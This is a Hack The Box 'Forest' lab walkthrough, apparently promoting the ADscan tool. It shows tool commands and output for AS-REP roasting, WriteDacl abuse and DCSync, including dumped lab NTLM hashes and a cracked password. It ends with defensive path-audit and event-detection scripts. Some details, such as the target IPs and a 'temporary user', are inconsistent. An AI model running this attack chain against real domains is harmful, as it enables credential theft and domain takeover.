🌲 Forest - Auto-Pwn Walkthrough
Automatically compromise HTB Forest using ADscan through AS-REP Roasting and Exchange Permissions abuse
Lab Information
- Platform: Hack The Box
- Machine: Forest (Retired)
- Difficulty: Easy
- OS: Windows Server 2016
- Domain: htb.local
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run adscan install to pull the ADscan runtime image.
Before starting this lab, verify your environment:
adscan check
adscan install # if the check reports missing images or Docker issues
Ensure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically tun0)
Attack Overview
Forest is vulnerable to:
- AS-REP Roasting - Initial access via account without pre-authentication
- BloodHound Analysis - Discover privilege escalation path
- WriteDacl Abuse - Exploit Exchange permissions to grant DCSync rights
- DCSync Attack - Dump domain credentials including Administrator hash
Estimated time with ADscan: ~3 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan start
On first run (no workspaces yet), ADscan will prompt you to name a workspace.
⚠ No workspaces detected.
Enter name for a new workspace: : forest
✓ Workspace 'forest' created
ℹ Loading workspace data from: ~/.adscan/workspaces/forest
ℹ Variables loaded from ~/.adscan/workspaces/forest/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/forest
✓ Workspace 'forest' selected automatically as it's the only one.
Scope: This walkthrough assumes you are already connected to the HTB VPN and can reach the Forest domain controller. From that point on, ADscan LITE automates the entire AD attack chain (initial access → Domain Admin → DCSync → flags).
For labs that require heavy web, reversing, or image puzzles before touching Active Directory, see Labs Scope & Coverage to understand where ADscan fits in the workflow.
Step 2: Configure Target
Set the scan parameters for Forest:
(ADscan:forest ~/.adscan/workspaces/forest) > set hosts 10.129.2.124
(ADscan:forest ~/.adscan/workspaces/forest) > set iface tun0
(ADscan:forest ~/.adscan/workspaces/forest) > set auto true
✓ Hosts configured: 10.129.2.124
✓ Interface configured: tun0 with IP: 10.10.14.192
✓ Auto mode configured: True
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:forest ~/.adscan/workspaces/forest) > start_unauth
ADscan will automatically discover the domain, enumerate users, attempt AS-REP roasting, and crack any discovered hashes.
3.1 Host Detection and Domain Discovery
ADscan begins by detecting the target and identifying the Active Directory domain:
ℹ Starting host detection on 10.129.2.124...
ℹ Starting smb scan
⚠ New domain found: htb.local
ℹ Updating DNS
✓ DNS resolution configured correctly for htb.local
✓ smb scan finished.
ADscan performs an SMB scan to identify the domain controller and domain name. Forest responds on port 445, revealing the htb.local domain.
3.2 SMB Null Session Enumeration
ADscan tests for anonymous SMB access to enumerate users:
ℹ Checking for null sessions on SMB on the domain htb.local
⚠ null session accepted successfully for domain htb.local.
ℹ Creating a SMB user list
✓ 19 Users found.
The domain controller allows null session authentication (no credentials required). This is a common misconfiguration that enables anonymous user enumeration via RPC/SMB.
Security Issue: Null sessions allow unauthenticated attackers to enumerate domain users, which can be used for password spraying or AS-REP roasting attacks.
3.3 AS-REP Roasting Attack
With the user list obtained, ADscan checks which accounts have Kerberos pre-authentication disabled:
ℹ Searching for AS-REP roastable users in domain htb.local
╭────────────────────────────────────────────────────────────╮
│ Asreproastable Users in htb.local (Guest) │
│ ╭────────────────────────────────────────────────────────╮ │
│ │ svc-alfresco │ │
│ ╰────────────────────────────────────────────────────────╯ │
╰────────────────────────────────────────────────────────────╯
ADscan found that the svc-alfresco account has the "Do not require Kerberos preauthentication" flag set. This allows requesting an AS-REP hash without providing credentials.
Technical detail: When pre-authentication is disabled, anyone can request an AS-REP for that user without proving knowledge of the password. Part of the response is encrypted with a key derived from the user's password, so it can be cracked offline.
3.4 Automatic Hash Cracking
ADscan automatically attempts to crack the extracted hash:
ℹ Using rockyou as the default wordlist.
⚠ Cracking asreproast hashes. Please be patient (this may take a while)
╭─────────────────── Hash Cracked ───────────────────╮
│ 🔓 Cracked Credentials │
│ ╭──────────────┬──────────╮ │
│ │ Username │ Password │ │
│ ├──────────────┼──────────┤ │
│ │ svc-alfresco │ s3rvice │ │
│ ╰──────────────┴──────────╯ │
╰────────────────────────────────────────────────────╯
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for svc-alfresco@htb.local
- ADscan uses hashcat to crack the AS-REP hash against the rockyou wordlist
- Password cracked: s3rvice (weak password)
- ADscan automatically validates the credentials by requesting a Kerberos TGT
- Result: Initial access achieved as svc-alfresco
Initial Access Achieved! We now have valid credentials: svc-alfresco:s3rvice
Step 4: Authenticated Enumeration (Automatic)
Once credentials are found, ADscan automatically pivots to authenticated enumeration.
4.1 Privilege Enumeration Prompts
ADscan asks if you want to perform deep privilege enumeration:
Do you want to enumerate privileges for user svc-alfresco? [y/n] (y): y
Do you want to enumerate privileges for user svc-alfresco on various services on hosts?
(⚠ WARNING: This will saturate the network if the number of hosts in domain htb.local is very high) [y/n]: y
Network Impact: With set auto True, ADscan automates most of the safe workflow but always asks for confirmation before noisy or potentially disruptive operations. With set auto False, the mode is more guided and asks additional questions along the way, while still requiring explicit confirmation for any sensitive action.
4.2 Service Privilege Checks
ADscan tests which services the compromised account has access to:
SMB Enumeration:
ℹ Starting smb privilege enumeration for user svc-alfresco
✗ smb enumeration completed for user svc-alfresco. No hosts with privileges found.
WinRM Enumeration:
ℹ Starting winrm privilege enumeration for user svc-alfresco
⚠ User svc-alfresco has winrm privileges on host 10.129.95.210
Do you want to enumerate host 10.129.95.210 via WinRM as user svc-alfresco? [y/n]: y
ADscan discovered that svc-alfresco can execute remote PowerShell commands via WinRM. This enables further enumeration and credential hunting on the domain controller.
4.3 WinRM Remote Enumeration
ADscan connects via WinRM to search for additional credentials:
ℹ Searching for Firefox files for user svc-alfresco
✗ No Firefox credential files found for user svc-alfresco
ℹ Obtaining PowerShell history for user svc-alfresco
✗ No PowerShell history found for the user.
ℹ Obtaining autologon credentials
✗ No autologon credentials found in the output.
Credential hunting checks:
- Firefox credentials - Stored browser passwords
- PowerShell history - Previous commands that might contain passwords
- Autologon credentials - Registry keys with saved login information
All checks returned negative, so ADscan continues with ACL enumeration.
4.4 ACL Analysis and Permissions Discovery
ADscan analyzes Active Directory ACLs (Access Control Lists) to find privilege escalation paths:
ℹ Enumerating ACEs for user svc-alfresco on high-value targets
ℹ No actionable high-value ACEs found, retrying without --high-value...
ACLs for source: svc-alfresco, target: all, source domain: htb.local, target domain: all
================================================================================
Source: svc-alfresco
Source Type: User
Source Domain: htb.local
Target: SM_1b41c9286325456bb
Target Type: User
Target Domain: htb.local
Target Enabled: False
Relation: GenericAll
--------------------------------------------------------------------------------
Source: svc-alfresco
Source Type: User
Source Domain: htb.local
Target: Hygiene Management
Target Type: Group
Target Domain: htb.local
Relation: GenericAll
Target Enabled: True
--------------------------------------------------------------------------------
ADscan is mapping all permissions that svc-alfresco has over other Active Directory objects. It found several GenericAll permissions, which grant full control over the target objects.
4.5 Critical Finding: Exchange Windows Permissions
ADscan identifies a critical privilege escalation path:
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y):
CRITICAL VULNERABILITY: The svc-alfresco user has GenericAll permission on the Exchange Windows Permissions group. This is the key to Domain Admin!
Why this matters:
- GenericAll = Full control over the Exchange Windows Permissions group
- Exchange Windows Permissions has WriteDacl permission on the domain object
- WriteDacl on domain = Can modify domain ACLs to grant DCSync rights
- DCSync rights = Can dump all domain credentials including Administrator
Attack chain:
svc-alfresco (GenericAll)
→ Exchange Windows Permissions (WriteDacl on domain)
→ Grant DCSync to svc-alfresco
→ Dump Administrator hash
→ Domain Admin access
Step 5: Privilege Escalation (Automatic)
Once the critical Exchange Windows Permissions vulnerability is identified, ADscan automatically exploits the privilege escalation path to Domain Admin.
5.1 AddSelf Attack Execution
ADscan automatically adds the compromised user to the Exchange Windows Permissions group:
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y): y
ℹ Executing AddSelf attack
✓ User svc-alfresco successfully added to group Exchange Windows Permissions
- ADscan leverages the GenericAll permission on the Exchange Windows Permissions group
- The compromised account svc-alfresco is added as a member of this privileged group
- This group membership grants WriteDacl permissions on the domain object
Technical detail: GenericAll permission allows full control over an object, including modifying group membership. By adding ourselves to Exchange Windows Permissions, we inherit the group's domain-level WriteDacl permission.
5.2 WriteDacl Exploitation
With membership in Exchange Windows Permissions, ADscan grants DCSync rights:
ℹ Adding DCSync permissions to user svc-alfresco on the domain domain
✓ GenericAll added successfully
- The WriteDacl permission allows modifying the domain object's security descriptor
- ADscan adds two critical ACEs (Access Control Entries) for svc-alfresco:
  - DS-Replication-Get-Changes (DCSync permission)
  - DS-Replication-Get-Changes-All (Extended DCSync rights)
- These permissions allow replicating Active Directory data like a legitimate domain controller
Critical Privilege Escalation: With DCSync rights, any account can impersonate a domain controller and request password hashes for ANY domain user, including Domain Admins.
5.3 DCSync Attack
ADscan immediately performs a DCSync attack to extract the Administrator hash:
ℹ Performing DCSync for user Administrator
✓ Found credential: htb.local/Administrator with hash 32693b11e6aa90eb43d32c72a07ceea6
- ADscan uses the DCSync permissions to request the Administrator account's password hash
- The domain controller responds with the NTLM hash: 32693b11e6aa90eb43d32c72a07ceea6
- This hash can be used for Pass-the-Hash attacks without cracking the password
Domain Admin Access Achieved! With the Administrator hash, we have complete control over the domain.
5.4 Automatic Flag Capture
ADscan automatically uses the Administrator hash to retrieve both user and root flags:
ℹ Obtaining flags from domain htb.local
╭──────┬─────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼─────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\svc-alfresco\Desktop\user.txt │ 880c29bf5ed0c9***************** │
│ root │ C:\Users\Administrator\Desktop\root.txt │ ee60c94c65d7dc***************** │
╰──────┴─────────────────────────────────────────┴──────────────────────────────────╯
- ADscan uses the Administrator hash to authenticate via WinRM or SMB
- Automatically locates and reads both user and root flag files
- User flag: 880c29bf5ed0c9*****************
- Root flag: ee60c94c65d7dc*****************
Machine Owned! Both flags captured. Forest has been completely compromised in approximately 3 minutes.
5.5 Complete Credential Dump
After capturing flags, ADscan performs a complete DCSync to dump all domain credentials:
ℹ Starting DCSync
ℹ Performing DCSync for all users...
✓ DCSync completed successfully.
ℹ Extracted 9 domain credentials. Extracted credentials for domain htb.local
╭──────────────────────┬──────────────────────────────────╮
│ User │ Credential │
├──────────────────────┼──────────────────────────────────┤
│ Administrator │ 32693b11e6aa90eb43d32c72a07ceea6 │
│ krbtgt │ 819af826bb148e603acb0f33d17632f8 │
│ $331000-VK4ADACQNUCA │ 31d6cfe0d16ae931b73c59d7e0c089c0 │
│ sebastien │ Ob********bi │
│ lucinda │ Th***************0l │
│ svc-alfresco │ s3***ce │
│ andy │ 29dfccaf39618ff101de5165b19d524b │
│ mark │ 9e63ebcb217bf3c6b27056fdcb6150f7 │
│ santi │ pl*******hb │
╰──────────────────────┴──────────────────────────────────╯
- ADscan performs DCSync for every domain user account
- All NTLM hashes are extracted and stored in the workspace
- Complete domain credential database is now available for persistence or lateral movement
Extracted credential set (Forest lab example):
- 9 credentials - Administrator + krbtgt + AS-REP/Kerberoast targets and relevant users
- Administrator hash - Domain Admin access via Pass-the-Hash
- Masked cracked passwords - Cleartext partially hidden in LITE; full view in PRO
Full Domain Compromise Complete! ADscan has automatically:
- Gained initial access via AS-REP Roasting
- Escalated privileges through Exchange permissions abuse
- Achieved Domain Admin via DCSync attack
- Captured both user and root flags
- Dumped 9 domain credentials (including Administrator, krbtgt and cracked user accounts)
Total time: ~3 minutes in automatic mode
Attack Chain Breakdown
Vulnerability: The svc-alfresco account has Kerberos pre-authentication disabled.
ADscan automation:
- Enumerates domain users via RPC
- Identifies AS-REP roastable accounts
- Requests AS-REP hash for offline cracking
- Cracks hash using configured wordlists
- Validates credentials and gains initial access
Vulnerability: Complex group membership chain grants WriteDacl permissions on domain object.
Privilege escalation path:
svc-alfresco (Current User)
→ Service Accounts (Member)
→ Privileged IT Accounts (Member)
→ Account Operators (Member)
→ Exchange Windows Permissions (WriteDacl)
→ Domain Object (DCSync Rights)
Vulnerability: Exchange Windows Permissions group has WriteDacl on the domain object.
ADscan automation:
- Creates temporary user account
- Adds user to Exchange Windows Permissions group
- Grants DCSync rights to the temporary user
- Performs DCSync attack to dump credentials
Technique: Use DCSync rights to replicate Administrator password hash.
Result:
- Full Domain Admin access via Pass-the-Hash
- Complete credential dump of all domain accounts
- User and root flags captured
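The membership chain and the two ACEs above are what make the escalation possible, and the same relationships can be audited before an attacker uses them. The following Python script is an added example (not ADscan's code or output): it models a constructed snapshot of the relationships described in this section as a small graph and searches it for any principal that can reach DACL control of the domain object; the right names (MemberOf, GenericAll, WriteDacl) are assumed labels for such a snapshot.

```python
from collections import deque

# Constructed snapshot of the relationships this walkthrough describes (not ADscan
# or BloodHound export data): MEMBER_OF maps a principal to its groups, ACES holds
# (holder, right, target) tuples.
MEMBER_OF = {
    "svc-alfresco": ["Service Accounts"],
    "Service Accounts": ["Privileged IT Accounts"],
    "Privileged IT Accounts": ["Account Operators"],
}
ACES = [
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "htb.local"),
]
GROUPS = {"Service Accounts", "Privileged IT Accounts",
          "Account Operators", "Exchange Windows Permissions"}
ADD_MEMBER_RIGHTS = {"GenericAll", "GenericWrite", "AddMember"}  # holder can join the group
DACL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}           # holder can rewrite the DACL

def edges(node):
    """Yield (next_node, label) for each step that passes rights on from node."""
    for group in MEMBER_OF.get(node, []):
        yield group, "MemberOf"          # members inherit the group's rights
    for holder, right, target in ACES:
        if holder != node:
            continue
        if target in GROUPS and right in ADD_MEMBER_RIGHTS:
            yield target, right          # holder can add itself, so group rights apply
        elif target not in GROUPS and right in DACL_RIGHTS:
            yield target, right          # holder controls the target's DACL

def path_to_domain_dacl(start, domain):
    """Breadth-first search; returns the shortest path from start to DACL control
    of the domain object as a list of nodes and '-[right]->' labels, or None."""
    queue = deque([(start, [start])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        for nxt, label in edges(node):
            step = path + [f"-[{label}]->", nxt]
            if nxt == domain:
                return step
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, step))
    return None

def audit(principals, domain="htb.local"):
    """Return {principal: readable path} for every principal that reaches the domain DACL."""
    found = {}
    for p in principals:
        path = path_to_domain_dacl(p, domain)
        if path:
            found[p] = " ".join(path)
    return found
```

Calling audit(["svc-alfresco", "andy"]) reports only svc-alfresco, with the full path through Account Operators and Exchange Windows Permissions to htb.local.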
Timing Breakdown
Automatic mode (set auto True):
- Unauthenticated scan: ~30 seconds
- Hash cracking: ~45 seconds
- Authenticated enumeration: ~30 seconds
- BloodHound collection: ~20 seconds
- Privilege escalation: ~40 seconds
- Total: ~2 minutes 45 seconds
Manual time: ~1h 23m 31s (HTB Forest first system blood benchmark) | ADscan time: ~3 minutes
Troubleshooting
Domain not found
Verify VPN connectivity to HTB network:
ping 10.10.10.161
ip addr show tun0
Hash cracking failed
Use alternative wordlists or cracking tools:
# ADscan will prompt for custom wordlist
# You can also manually crack with John the Ripper if needed
BloodHound upload failed
Ensure BloodHound CE is running and accessible:
adscan check
# If BloodHound isn't running, start it via:
adscan start
Authentication errors
Verify credentials were correctly captured:
(ADscan:forest ~/.adscan/workspaces/forest) > creds show # Check if svc-alfresco credentials are listed
Key Learning Points
What ADscan Automated
- Reconnaissance: RPC null session user enumeration
- Initial Access: AS-REP roasting and offline hash cracking
- Post-Compromise Enumeration: BloodHound data collection
- Analysis: Automated attack path discovery
- Privilege Escalation: WriteDacl abuse and DCSync execution
- Post-Exploitation: Complete credential harvesting
Security Lessons
- Disabled pre-authentication: High-risk configuration that enables AS-REP roasting
- Exchange permissions: Default Exchange installation grants excessive domain privileges
- Least privilege: Service accounts should not be in privileged groups
- Defense detection: Monitor for DCSync attempts and suspicious group modifications
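To make the detection lesson concrete, here is an added Python example (not part of ADscan) that runs simple rules over constructed Windows Security-log events covering each stage of this chain: a TGT request for an account without pre-authentication (4768), a member added to a watched group (4728/4732/4756), a DACL change on the domain object (5136) and replication rights exercised by a non-machine account (4662). Event field names follow the Security log; the DC name DC01$ and all sample values are made up.

```python
from collections import defaultdict

DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes (4662 Properties)
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to global / local / universal group
WATCHED_GROUPS = {"exchange windows permissions", "account operators"}

def classify(ev):
    """Map one Security-log event (a dict of its fields) to a rule name, or None."""
    eid = ev["EventID"]
    if eid == 4768 and ev.get("PreAuthType") == "0":
        return "tgt-without-preauth"            # the request AS-REP roasting relies on
    if eid in GROUP_ADD_EVENTS and ev.get("TargetUserName", "").lower() in WATCHED_GROUPS:
        return "privileged-group-member-added"
    if (eid == 5136 and ev.get("ObjectClass") == "domainDNS"
            and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"):
        return "domain-dacl-modified"           # WriteDacl used on the domain object
    if (eid == 4662 and not ev["SubjectUserName"].endswith("$")
            and DCSYNC_GUIDS & set(ev.get("Properties", []))):
        return "dcsync-by-user-account"         # real DCs replicate as machine accounts
    return None

def actor(ev):
    """4768 names the requested account in TargetUserName; other events use SubjectUserName."""
    return ev["TargetUserName"] if ev["EventID"] == 4768 else ev["SubjectUserName"]

def detect(events):
    """Return {actor: [rule, ...]} for every event that matched a rule."""
    hits = defaultdict(list)
    for ev in events:
        rule = classify(ev)
        if rule:
            hits[actor(ev)].append(rule)
    return dict(hits)

def chain_suspects(hits):
    """Actors that modified a watched group or the domain DACL and then ran DCSync."""
    setup = {"privileged-group-member-added", "domain-dacl-modified"}
    return sorted(a for a, rules in hits.items()
                  if "dcsync-by-user-account" in rules and setup & set(rules))

# Constructed sample events mirroring this walkthrough (field names follow the
# Windows Security log; the DC name DC01$ and all values are made up).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0"},
    {"EventID": 4768, "TargetUserName": "andy", "PreAuthType": "2"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 5136, "SubjectUserName": "svc-alfresco", "ObjectClass": "domainDNS",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "Properties": [*DCSYNC_GUIDS]},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "Properties": [*DCSYNC_GUIDS]},
]
```

Running detect(SAMPLE_EVENTS) attributes all four rules to svc-alfresco and ignores the DC's own replication traffic, so chain_suspects returns just that account.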